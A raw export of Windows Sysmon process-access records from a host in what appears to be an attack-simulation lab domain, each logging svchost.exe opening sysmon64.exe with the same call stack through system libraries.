12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 